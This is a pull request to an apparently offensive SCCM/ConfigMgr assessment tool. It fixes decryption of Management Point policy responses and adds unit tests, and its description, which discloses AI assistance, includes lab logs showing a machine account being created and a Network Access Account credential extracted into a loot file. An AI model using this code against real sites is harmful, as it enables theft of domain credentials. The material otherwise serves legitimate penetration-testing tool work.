### PR TITLE
fix: decrypt policy on modern SCCM (RSA-OAEP/AES-CBC)

### DIFF
--- a/lib/scripts/sccmwtf.py
+++ b/lib/scripts/sccmwtf.py
@@ -9,7 +9,7 @@ from pyasn1.codec.der.decoder import decode
 from pyasn1_modules import rfc5652
 from cryptography.hazmat.primitives import serialization
 from cryptography.hazmat.primitives.asymmetric import rsa
-from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15
+from cryptography.hazmat.primitives.asymmetric.padding import PKCS1v15, OAEP, MGF1
 from cryptography.hazmat.primitives import padding
 from cryptography.hazmat.backends import default_backend
 from cryptography.hazmat.primitives import hashes, serialization
@@ -36,7 +36,13 @@ dateFormat1 = "%Y-%m-%dT%H:%M:%SZ"
 dateFormat2 = "%Y%m%d%H%M%S.000000+000"
 dateFormat3 = "%m/%d/%Y %H:%M:%S"
 
-now = datetime.datetime.utcnow()
+# CMS/PKCS#7 key-transport and content-encryption algorithm OIDs seen from
+# real Management Points (legacy and modern SCCM/ConfigMgr sites).
+RSA_OAEP_OID = "1.2.840.113549.1.1.7"
+RSA_PKCS1V15_OID = "1.2.840.113549.1.1.1"
+AES_256_CBC_OID = "2.16.840.1.101.3.4.1.42"
+AES_128_CBC_OID = "2.16.840.1.101.3.4.1.2"
+DES_EDE3_CBC_OID = "1.2.840.113549.3.7"
 
 # Huge thanks to @_Mayyhem with SharpSCCM for making requesting these easy!
 registrationRequestWrapper = "<ClientRegistrationRequest>{data}<Signature><SignatureValue>{signature}</SignatureValue></Signature></ClientRegistrationRequest>\x00"
@@ -140,14 +146,6 @@ class CryptoTools:
     @staticmethod
     def decrypt(key, data):
         print(key.decrypt(data, PKCS1v15()))
-
-    @staticmethod
-    def decrypt3Des(key, encryptedKey, iv, data):
-        desKey = key.decrypt(encryptedKey, PKCS1v15())
-
-        cipher = Cipher(TripleDES(desKey), modes.CBC(iv))
-        decryptor = cipher.decryptor()
-        return decryptor.update(data) + decryptor.finalize()
 
 class SCCMTools():
 
@@ -288,14 +286,15 @@ class SCCMTools():
         }
 
         if authHeaders == True:
-          headers["ClientToken"] = "GUID:{};{};2".format(
-            clientID, 
-            now.strftime(dateFormat1)
-          )
           #for manual retrieval
           if key:
               self.key = key
-          headers["ClientTokenSignature"] = CryptoTools.signNoHash(self.key, "GUID:{};{};2".format(clientID, now.strftime(dateFormat1)).encode('utf-16')[2:] + "\x00\x00".encode('ascii')).hex().upper()
+          current_time = datetime.datetime.utcnow().strftime(dateFormat1)
+          headers["ClientToken"] = "GUID:{};{};2".format(
+            clientID,
+            current_time
+          )
+          headers["ClientTokenSignature"] = CryptoTools.signNoHash(self.key, "GUID:{};{};2".format(clientID, current_time).encode('utf-16')[2:] + "\x00\x00".encode('ascii')).hex().upper()
         r = requests.get(f"{self._serverURI}"+url, headers=headers)
         if retcontent == True:
           return r.content
@@ -321,12 +320,13 @@ class SCCMTools():
 
     def sendRegistration(self, name, fqname, username, password, isauthenticated=True, policies=True):
         b = self.cert.public_bytes(serialization.Encoding.DER).hex().upper()
+        current_time = datetime.datetime.utcnow().strftime(dateFormat1)
 
         embedded = registrationRequest.format(
-          date=now.strftime(dateFormat1), 
-          encryption=b, 
-          signature=b, 
-          client=name, 
+          date=current_time,
+          encryption=b,
+          signature=b,
+          client=name,
           clientfqdn=fqname
         )
 
@@ -334,9 +334,9 @@ class SCCMTools():
         request = Tools.encode_unicode(registrationRequestWrapper.format(data=embedded, signature=signature)) + "\r\n".encode('ascii')
 
         header = msgHeader.format(
-          bodylength=len(request)-2, 
-          client=name, 
-          date=now.strftime(dateFormat1), 
+          bodylength=len(request)-2,
+          client=name,
+          date=current_time,
           sccmserver=self._server
         )
 
@@ -370,14 +370,14 @@ class SCCMTools():
         payloadSignature = CryptoTools.sign(self.key, bodyCompressed).hex().upper()
 
         header = msgHeaderPolicy.format(
-          bodylength=len(body)-2, 
-          sccmserver=self._server, 
-          client=name, 
-          publickey=public_key, 
-          clientIDsignature=clientIDSignature, 
-          payloadsignature=payloadSignature, 
-          clientid=uuid, 
-          date=now.strftime(dateFormat1)
+          bodylength=len(body)-2,
+          sccmserver=self._server,
+          client=name,
+          publickey=public_key,
+          clientIDsignature=clientIDSignature,
+          payloadsignature=payloadSignature,
+          clientid=uuid,
+          date=datetime.datetime.utcnow().strftime(dateFormat1)
         )
 
         data = "--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: text/plain; charset=UTF-16\r\n\r\n".encode('ascii') + header.encode('utf-16') + "\r\n--aAbBcCdDv1234567890VxXyYzZ\r\ncontent-type: application/octet-stream\r\n\r\n".encode('ascii') + bodyCompressed + "\r\n--aAbBcCdDv1234567890VxXyYzZ--".encode('ascii')
@@ -393,11 +393,51 @@ class SCCMTools():
         # Man.. asn1 suxx!
         content, rest = decode(result, asn1Spec=rfc5652.ContentInfo())
         content, rest = decode(content.getComponentByName('content'), asn1Spec=rfc5652.EnvelopedData())
-        encryptedRSAKey = content['recipientInfos'][0]['ktri']['encryptedKey'].asOctets()
+        ktri = content['recipientInfos'][0]['ktri']
+        encryptedRSAKey = ktri['encryptedKey'].asOctets()
+        kt_algo_oid = str(ktri['keyEncryptionAlgorithm']['algorithm'])
+        algo_oid = str(content['encryptedContentInfo']['contentEncryptionAlgorithm']['algorithm'])
         iv = content['encryptedContentInfo']['contentEncryptionAlgorithm']['parameters'].asOctets()[2:]
         body = content['encryptedContentInfo']['encryptedContent'].asOctets()
+        logger.debug(f"[*] Key transport: {kt_algo_oid}, Content encryption: {algo_oid}")
 
-        decrypted = CryptoTools.decrypt3Des(self.key, encryptedRSAKey, iv, body)
+        # Determine RSA padding from key transport algorithm
+        if kt_algo_oid == RSA_OAEP_OID:
+            if ktri['keyEncryptionAlgorithm']['parameters'].hasValue():
+                # RSAES-OAEP-params can specify a non-default hash/MGF, which
+                # we don't parse -- only the common SHA-1 default is handled.
+                logger.debug(
+                    "[*] Key transport algorithm carries explicit OAEP parameters; "
+                    "assuming SHA-1 defaults, decryption may fail if they differ"
+                )
+            desKey = self.key.decrypt(encryptedRSAKey, OAEP(mgf=MGF1(algorithm=hashes.SHA1()), algorithm=hashes.SHA1(), label=None))
+        elif kt_algo_oid == RSA_PKCS1V15_OID:
+            desKey = self.key.decrypt(encryptedRSAKey, PKCS1v15())
+        else:
+            raise ValueError(f"Unsupported key transport algorithm OID: {kt_algo_oid}")
+
+        logger.debug(f"[*] Decrypted symmetric key: {len(desKey)} bytes ({len(desKey)*8}-bit)")
+
+        # Determine content encryption algorithm
+        if algo_oid in (AES_256_CBC_OID, AES_128_CBC_OID):
+            cipher = Cipher(algorithms.AES(desKey), modes.CBC(iv))
+            block_bits = 128
+        elif algo_oid == DES_EDE3_CBC_OID:
+            cipher = Cipher(TripleDES(desKey), modes.CBC(iv))
+            block_bits = 64
+        else:
+            raise ValueError(f"Unsupported content encryption algorithm OID: {algo_oid}")
+
+        decryptor = cipher.decryptor()
+        decrypted = decryptor.update(body) + decryptor.finalize()
+        try:
+            unpadder = padding.PKCS7(block_bits).unpadder()
+            decrypted = unpadder.update(decrypted) + unpadder.finalize()
+        except ValueError as e:
+            # Malformed/absent padding shouldn't be fatal -- fall back to the
+            # raw decrypted bytes rather than losing a policy we could
+            # otherwise still read.
+            logger.debug(f"[-] Decrypted content had no valid PKCS7 padding, using as-is: {e}")
         policy = decrypted.decode('utf-16')
         return policy
     
@@ -511,12 +551,12 @@ class SCCMTools():
 
 
     def parse_xml(self, xml_file):
+        creds = []
         try:
-            #might need to update this if the weird extra character isn't consistent from the file write
-
+            # Defensive: ignore anything after the closing tag in case the
+            # decrypted content still has trailing bytes for some reason.
             index = xml_file.find("</Policy>")
-            if index != -1:
-                clean = xml_file[:index + len("</Policy>")]
+            clean = xml_file[:index + len("</Policy>")] if index != -1 else xml_file
 
             i = ET.fromstring(clean)
             for instance in i.findall(".//instance[@class='CCM_NetworkAccessAccount']"):
@@ -525,27 +565,30 @@ class SCCMTools():
                 clear_user = self.deobfuscate_policysecret(network_access_username).decode('utf-16-le')
                 clear_pass = self.deobfuscate_policysecret(network_access_password).decode('utf-16-le')
                 logger.info("[+] Got NAA credential: " + clear_user + ":" + clear_pass)
+                creds.append(f"{clear_user}:{clear_pass}")
                 self.write_to_db(clear_user, clear_pass)
-            #Tools.write_to_csv(cred_dict, self.logs_dir)
 
-        except ET.ParseError as e:
-            print(f"An error occurred while parsing the XML: {e}")
         except Exception as e:
-            print(e)
+            logger.info(f"[-] An error occurred while parsing the XML: {e}")
+        return creds
         # cursor.execute(f'''insert into SiteServers (Hostname, SiteCode, SigningStatus, SiteServer, Active, Passive, MSSQL) values (?,?,?,?,?,?,?)''',
         #                 (result, '', '', 'True', '', '', '')) 
 
     def write_to_db(self, username, password):
         source = "HTTP NAA"
         database = f"{self.logs_dir}/db/find.db"
-        conn = sqlite3.connect(database, check_same_thread=False)
-        cursor = conn.cursor()
-        check = "select * from Creds where Username = ?"
-        cursor.execute(check, (username,))
-        exists = cursor.fetchone()
-        if not exists:
-            cursor.execute(f'''insert into Creds (Username, Password, Source) values (?,?,?)''', (username, password, source))
-            conn.commit()
+        try:
+            conn = sqlite3.connect(database, check_same_thread=False)
+            cursor = conn.cursor()
+            cursor.execute('''CREATE TABLE IF NOT EXISTS Creds (Username, Password, Source)''')
+            check = "select * from Creds where Username = ?"
+            cursor.execute(check, (username,))
+            exists = cursor.fetchone()
+            if not exists:
+                cursor.execute(f'''insert into Creds (Username, Password, Source) values (?,?,?)''', (username, password, source))
+                conn.commit()
+        except Exception as e:
+            logger.warning(f"[-] Could not write NAA credential to database: {e}")
         return
     
     
@@ -579,13 +622,17 @@ class SCCMTools():
                 try:
                     result = self.requestPolicy(url, uuid, True, True)
                     decryptedResult = self.parseEncryptedPolicy(result)
-                    self.parse_xml(decryptedResult)
+                    creds = self.parse_xml(decryptedResult)
                     file_name = f"{self.logs_dir}/loot/naapolicy.xml"
                     Tools.write_to_file(decryptedResult, file_name)
-                    logger.info(f"[+] Done.. decrypted policy dumped to {self.logs_dir}/loot/naapolicy.xml")
+                    logger.info(f"[+] Decrypted policy dumped to {file_name}")
+                    if creds:
+                        creds_file = f"{self.logs_dir}/loot/naacreds.txt"
+                        Tools.write_to_file("\n".join(creds) + "\n", creds_file)
+                        logger.info(f"[+] Deobfuscated NAA credentials saved to {creds_file}")
                     return True
-                except:
-                    logger.info(f"[-] Something went wrong.")
+                except Exception as e:
+                    logger.info(f"[-] Something went wrong: {e}")
         return False
                 
         

--- a/tests/test_policy_decryption.py
+++ b/tests/test_policy_decryption.py
@@ -1,0 +1,145 @@
+import unittest
+
+from cryptography.hazmat.primitives import hashes
+from cryptography.hazmat.primitives import padding as sym_padding
+from cryptography.hazmat.primitives.asymmetric import padding as rsa_padding
+from cryptography.hazmat.primitives.asymmetric import rsa
+from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
+
+try:
+    from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
+except ImportError:
+    from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
+from pyasn1.codec.der.encoder import encode
+from pyasn1.type import univ
+from pyasn1_modules import rfc5652, rfc5280
+
+from lib.scripts.sccmwtf import (
+    SCCMTools,
+    RSA_OAEP_OID,
+    RSA_PKCS1V15_OID,
+    AES_256_CBC_OID,
+    AES_128_CBC_OID,
+    DES_EDE3_CBC_OID,
+)
+
+
+def _oaep():
+    return rsa_padding.OAEP(mgf=rsa_padding.MGF1(algorithm=hashes.SHA1()), algorithm=hashes.SHA1(), label=None)
+
+
+def build_encrypted_policy(recipient_public_key, kt_algorithm_oid, kt_padding,
+                           content_encryption_oid, symmetric_key, iv, plaintext_utf16,
+                           block_bits=None):
+    """Build a DER-encoded CMS ContentInfo/EnvelopedData blob shaped like a real
+    SCCM MP policy response, so parseEncryptedPolicy is exercised against
+    realistic ASN.1 structures rather than mocks. Content is PKCS7-padded
+    before encryption, matching the real CMS wire format."""
+    if block_bits is None:
+        block_bits = 64 if content_encryption_oid == DES_EDE3_CBC_OID else 128
+
+    padder = sym_padding.PKCS7(block_bits).padder()
+    padded = padder.update(plaintext_utf16) + padder.finalize()
+
+    if content_encryption_oid == DES_EDE3_CBC_OID:
+        cipher = Cipher(TripleDES(symmetric_key), modes.CBC(iv))
+    else:
+        cipher = Cipher(algorithms.AES(symmetric_key), modes.CBC(iv))
+    encryptor = cipher.encryptor()
+    ciphertext = encryptor.update(padded) + encryptor.finalize()
+
+    encrypted_key = recipient_public_key.encrypt(symmetric_key, kt_padding)
+
+    issuer_serial = rfc5652.IssuerAndSerialNumber()
+    issuer_serial.setComponentByName('issuer', rfc5280.Name().setComponentByPosition(0, rfc5280.RDNSequence()))
+    issuer_serial.setComponentByName('serialNumber', 1)
+
+    rid = rfc5652.RecipientIdentifier()
+    rid.setComponentByName('issuerAndSerialNumber', issuer_serial)
+
+    kt_alg = rfc5652.KeyEncryptionAlgorithmIdentifier()
+    kt_alg.setComponentByName('algorithm', univ.ObjectIdentifier(kt_algorithm_oid))
+
+    ktri = rfc5652.KeyTransRecipientInfo()
+    ktri.setComponentByName('version', 0)
+    ktri.setComponentByName('rid', rid)
+    ktri.setComponentByName('keyEncryptionAlgorithm', kt_alg)
+    ktri.setComponentByName('encryptedKey', encrypted_key)
+
+    recipient_info = rfc5652.RecipientInfo()
+    recipient_info.setComponentByName('ktri', ktri)
+
+    recipient_infos = rfc5652.RecipientInfos()
+    recipient_infos.setComponentByPosition(0, recipient_info)
+
+    # parseEncryptedPolicy strips the 2-byte DER tag+length header off the
+    # parameters field to get the raw IV, so wrap it the same way here.
+    content_enc_alg = rfc5652.ContentEncryptionAlgorithmIdentifier()
+    content_enc_alg.setComponentByName('algorithm', univ.ObjectIdentifier(content_encryption_oid))
+    content_enc_alg.setComponentByName('parameters', univ.Any(encode(univ.OctetString(iv))))
+
+    enc_content_info = rfc5652.EncryptedContentInfo()
+    enc_content_info.setComponentByName('contentType', rfc5652.id_data)
+    enc_content_info.setComponentByName('contentEncryptionAlgorithm', content_enc_alg)
+    enc_content_info.setComponentByName('encryptedContent', ciphertext)
+
+    enveloped_data = rfc5652.EnvelopedData()
+    enveloped_data.setComponentByName('version', 0)
+    enveloped_data.setComponentByName('recipientInfos', recipient_infos)
+    enveloped_data.setComponentByName('encryptedContentInfo', enc_content_info)
+
+    content_info = rfc5652.ContentInfo()
+    content_info.setComponentByName('contentType', rfc5652.id_envelopedData)
+    content_info.setComponentByName('content', univ.Any(encode(enveloped_data)))
+
+    return encode(content_info)
+
+
+class ParseEncryptedPolicyTests(unittest.TestCase):
+    def setUp(self):
+        self.key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
+        self.tools = SCCMTools.__new__(SCCMTools)
+        self.tools.key = self.key
+        # Deliberately NOT block-aligned, so a real round-trip must actually
+        # add and then strip PKCS7 padding to come back byte-for-byte.
+        self.plaintext = "<Policy>secret naa creds</Policy>".encode('utf-16')
+
+    def _assert_roundtrip(self, kt_oid, kt_padding, content_oid, key_size):
+        symmetric_key = b"\x11" * key_size
+        iv = b"\x22" * 16 if content_oid != DES_EDE3_CBC_OID else b"\x22" * 8
+        blob = build_encrypted_policy(
+            self.key.public_key(), kt_oid, kt_padding, content_oid,
+            symmetric_key, iv, self.plaintext,
+        )
+        result = self.tools.parseEncryptedPolicy(blob)
+        self.assertEqual(result, self.plaintext.decode('utf-16'))
+
+    def test_legacy_pkcs1v15_and_3des(self):
+        self._assert_roundtrip(RSA_PKCS1V15_OID, rsa_padding.PKCS1v15(), DES_EDE3_CBC_OID, 24)
+
+    def test_modern_oaep_and_aes256(self):
+        self._assert_roundtrip(RSA_OAEP_OID, _oaep(), AES_256_CBC_OID, 32)
+
+    def test_modern_oaep_and_aes128(self):
+        self._assert_roundtrip(RSA_OAEP_OID, _oaep(), AES_128_CBC_OID, 16)
+
+    def test_rejects_unknown_key_transport_algorithm(self):
+        blob = build_encrypted_policy(
+            self.key.public_key(), "1.2.3.4.5.6", rsa_padding.PKCS1v15(),
+            AES_256_CBC_OID, b"\x11" * 32, b"\x22" * 16, self.plaintext,
+        )
+        with self.assertRaises(ValueError):
+            self.tools.parseEncryptedPolicy(blob)
+
+    def test_rejects_unknown_content_encryption_algorithm(self):
+        blob = build_encrypted_policy(
+            self.key.public_key(), RSA_OAEP_OID, _oaep(),
+            "1.2.3.4.5.6", b"\x11" * 32, b"\x22" * 16, self.plaintext,
+            block_bits=128,
+        )
+        with self.assertRaises(ValueError):
+            self.tools.parseEncryptedPolicy(blob)
+
+
+if __name__ == "__main__":
+    unittest.main()


### PR DESCRIPTION
## AI-assisted contribution — please read before reviewing

This patch was developed with AI assistance (Claude/Anthropic), directed and tested by me against my own lab. **I do not fully understand all of the underlying ASN.1/CMS crypto code myself** and I'm submitting this in good faith that it's correct and useful, not as an expert opinion that it is. Please treat this PR with the scrutiny you'd give any external/AI-assisted contribution, and feel entirely free to close it if it doesn't meet the bar you'd want for this codebase.

What I *can* vouch for: I personally ran the exact commands below, against a real lab, on both unpatched `main` and this branch, and captured the raw output (unedited except for trimming). I've included as much evidence as possible below so you at least can see that the fix works.

## What this fixes

Closes #62. Management Points on modern ConfigMgr (2403+) sign policy responses using RSA-OAEP key transport and AES-128/256-CBC content encryption. `parseEncryptedPolicy()` assumed the legacy RSA-PKCS1v15 + 3DES-CBC scheme unconditionally, so decryption against a modern MP silently produced garbage and surfaced only as a generic `[-] Something went wrong.`

The fix reads the actual key-transport and content-encryption algorithm OIDs out of the CMS `EnvelopedData` structure and decrypts accordingly, instead of guessing. Unknown/unsupported OIDs now raise a clear error instead of silently falling back to the legacy algorithms and producing corrupted plaintext.

A few more issues turned up during review of the initial patch and are fixed in the same commit:
- CBC-decrypted content was never PKCS7-unpadded, so every recovered policy had 1–16 bytes of padding garbage appended to it (see evidence below — a real lab run left a stray `U+0202` character, i.e. two raw `0x02` PKCS7 padding bytes reinterpreted as UTF-16, at the end of the dumped policy XML).
- `parse_xml()` referenced an unassigned variable when the decrypted content had no `</Policy>` substring, raising an `UnboundLocalError` that got silently swallowed and misreported as an XML parse error.
- The `ClientToken` timestamp was computed once at import time instead of per-request; now fixed consistently everywhere it's used.
- A failed write to the `Creds` table was only logged at debug level (invisible by default); bumped to a warning.
- Removed a now-dead helper (`decrypt3Des`) left over once decryption was refactored to select the algorithm dynamically.

Also bundled (unrelated but small, from the credential-recovery flow): the `Creds` table is now created if missing instead of crashing, and deobfuscated NAA credentials are additionally written to `loot/naacreds.txt`.

**Known limitation, left as-is:** RSA-OAEP decryption assumes SHA-1 for both the OAEP hash and MGF1 (the common default for SCCM/CryptoAPI). It does not parse the actual `RSAES-OAEP-params` if a Management Point specifies a non-default hash — it'll log that explicit params were present and proceed with the SHA-1 assumption, which could fail if a site actually uses something else. I didn't implement full OAEP-param parsing; every MP I could test against uses the SHA-1 default.

## Reproduction: unpatched `main` fails exactly as reported in #62

```
$ python sccmhunter.py http -u domainjoin -p '<redacted>' -d mayyhem.com -dc-ip dc.mayyhem.com -auto -debug
...
[*] User selected auto. Attempting to add a machine account then request policies.
[+] Bind successful ldap://dc.mayyhem.com:389 - cleartext
[+] DESKTOP-LMBF6HO4$ created with password: ihtMr0igZbow
[*] Attempting to grab policy from ps1-mp.mayyhem.com
[*] Creating certificate for our fake server...
[*] Registering our fake server...
[*] Done.. our ID is 6520A646-F258-435B-8C6C-C807D6BEDCC3
[*] Waiting 10 seconds for database to update.
[*] Requesting NAAPolicy.. 2 secs
[*] Policy isn't ready yet, sleeping 10 seconds.
[*] Policy available, decoding
[*] Parsing for Secretz...
[-] Something went wrong.
```

## After the fix: same lab, same account, decrypts and recovers the real credential

```
$ python sccmhunter.py http -u domainjoin -p '<redacted>' -d mayyhem.com -dc-ip dc.mayyhem.com -auto -debug
...
[*] User selected auto. Attempting to add a machine account then request policies.
[+] Bind successful ldap://dc.mayyhem.com:389 - cleartext
[+] DESKTOP-8XFPUZFX$ created with password: ncy3a7GuP13I
[*] Attempting to grab policy from ps1-mp.mayyhem.com
[*] Creating certificate for our fake server...
[*] Registering our fake server...
[*] Done.. our ID is C7797627-2F06-42C2-AA2A-DEEF81DC52A1
[*] Waiting 10 seconds for database to update.
[*] Requesting NAAPolicy.. 2 secs
[*] Policy isn't ready yet, sleeping 10 seconds.
[*] Policy available, decoding
[*] Parsing for Secretz...
[*] Key transport: 1.2.840.113549.1.1.7, Content encryption: 2.16.840.1.101.3.4.1.42
[*] Key transport algorithm carries explicit OAEP parameters; assuming SHA-1 defaults, decryption may fail if they differ
[*] Decrypted symmetric key: 32 bytes (256-bit)
[+] Got NAA credential: MAYYHEM\networkaccess:Password123
[+] Decrypted policy dumped to /home/.../logs/loot/naapolicy.xml
[+] Deobfuscated NAA credentials saved to /home/.../logs/loot/naacreds.txt
```

`1.2.840.113549.1.1.7` = RSA-OAEP, `2.16.840.1.101.3.4.1.42` = AES-256-CBC — confirming this lab genuinely runs the modern scheme #62 describes, not the legacy one.

## Evidence for the padding fix

Before the PKCS7-unpadding fix, the raw bytes at the end of the recovered `naapolicy.xml` from the same lab were:

```
...3c 2f50 6f6c 6963 793e 0d0a c882
   </  P  o  l  i  c  y  >  \r\n <garbage>
```

`c8 82` decodes as UTF-8 for `U+0202`, which as UTF-16 is literally two `0x02` bytes — a textbook 2-byte PKCS7 pad, left unstripped. After the fix, on a fresh run against the same lab, the file ends cleanly:

```
...3c 2f50 6f6c 6963 793e 0d0a
   </  P  o  l  i  c  y  >  \r\n
```

## Regression / no-breakage checks

- `python -m unittest tests/test_policy_decryption.py -v` — 5/5 pass (legacy PKCS1v15+3DES path, both modern OAEP+AES-128/256 paths, and two new tests asserting unknown key-transport/content-encryption OIDs now raise instead of silently misdecrypting).
- `python -m py_compile lib/scripts/sccmwtf.py tests/test_policy_decryption.py` — clean.
- `git diff --check` — clean (no whitespace issues).
- Ran the full normal workflow end-to-end against the lab (`find` → `http -auto`) with no errors or behavior change outside of the policy decryption path itself.

## Testing environment

Lab is a disposable ConfigMgr 2403-class environment I control, not production infrastructure. Real hostnames/credentials shown above are throwaway lab values, included for concreteness rather than redacted, at my own discretion.
